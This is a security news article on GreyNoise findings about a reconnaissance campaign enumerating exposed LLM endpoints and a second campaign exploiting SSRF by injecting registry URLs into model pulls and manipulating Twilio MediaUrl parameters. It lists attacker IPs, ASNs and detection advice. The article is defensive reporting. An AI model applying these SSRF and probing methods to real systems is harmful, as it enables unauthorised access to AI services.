Threat actors are orchestrating a widespread reconnaissance campaign targeting large language models (LLMs), potentially paving the way for future cyberattacks on exposed AI models, according to a report from security researchers at GreyNoise. The attackers have scanned for various major LLM families, including those compatible with OpenAI and Google Gemini, searching for “misconfigured proxy servers that might leak access to commercial APIs.” Over 80,000 enumeration requests from the threat actors were recorded by GreyNoise’s honeypots.
The researchers highlighted that such extensive mapping of infrastructure suggests premeditated plans to exploit the vulnerabilities discovered. “If you’re running exposed LLM endpoints, you’re likely already on someone’s list,” they warned.
The reconnaissance effort began on December 28, when two IP addresses initiated a systematic probe of over 73 LLM model endpoints. Within just 11 days, the attackers generated 80,469 sessions, employing deliberately innocuous test queries likely intended to identify responsive models without triggering security alerts.
The investigation revealed that the threat actors were targeting every prominent model family, including:
- OpenAI (GPT-4o and variants)
- Anthropic (Claude Sonnet, Opus, Haiku)
- Meta (Llama 3.x)
- DeepSeek (DeepSeek-R1)
- Google (Gemini)
- Mistral
- Alibaba (Qwen)
- xAI (Grok)
The two IP addresses linked to the reconnaissance campaign are 45.88.186.70, associated with AS210558 (1337 Services GmbH), and 204.76.203.125, linked to AS51396 (Pfcloud UG). Both have histories of exploiting known vulnerabilities, including the “React2Shell” vulnerability, CVE-2025-55182, and the TP-Link Archer vulnerability, CVE-2023-1389.
Researchers concluded that the campaign reflects the actions of a professional threat actor engaging in reconnaissance activities to identify targets for cyberattacks. “The infrastructure overlap with established CVE scanning operations suggests this enumeration feeds into a larger exploitation pipeline,” they stated. “They’re building target lists.”
In a related development, a second campaign aimed at exploiting server-side request forgery (SSRF) vulnerabilities has also been identified. This attack method could compel servers to make outbound connections to attacker-controlled infrastructure. The attackers targeted honeypot infrastructure’s model pull functionality by injecting malicious registry URLs and also exploited Twilio SMS webhook integrations by manipulating MediaUrl parameters.
Using ProjectDiscovery’s Out-of-band Application Security Testing (OAST) infrastructure, the attackers confirmed successful SSRF exploitation through callback validation. A single JA4H signature appeared in nearly all attacks, indicating the use of shared automation tools, likely Nuclei. A total of 62 source IPs across 27 countries were identified, but their consistent fingerprints suggest the use of VPS-based infrastructure rather than a botnet.
Researchers assessed that this second campaign was possibly orchestrated by security researchers or bug bounty hunters, but they noted that the scale and timing around Christmas suggests “grey-hat operations pushing boundaries.” The two campaigns underscore how threat actors are systematically mapping the expanding surface area of AI deployments.
To mitigate these risks, GreyNoise recommends that organizations take proactive measures to secure their LLMs. This includes locking down model pulls to accept models only from trusted registries and implementing egress filtering to prevent SSRF callbacks from reaching attacker infrastructure. Organizations should also be vigilant in detecting enumeration patterns and alerting on rapid-fire requests hitting multiple model endpoints, particularly watching for fingerprinting queries such as “How many states are there in the United States?”
Moreover, blocking OAST at DNS is advised to sever the callback channel that confirms successful exploitation. Rate-limiting suspicious ASNs is another protective measure, with AS152194, AS210558, and AS51396 appearing prominently in attack traffic. Continuous monitoring of JA4 fingerprints is also advocated to stay ahead of potential threats.
See also
Anthropic’s Claims of AI-Driven Cyberattacks Raise Industry Skepticism
Anthropic Reports AI-Driven Cyberattack Linked to Chinese Espionage
Quantum Computing Threatens Current Cryptography, Experts Seek Solutions
Anthropic’s Claude AI exploited in significant cyber-espionage operation
AI Poisoning Attacks Surge 40%: Businesses Face Growing Cybersecurity Risks



















































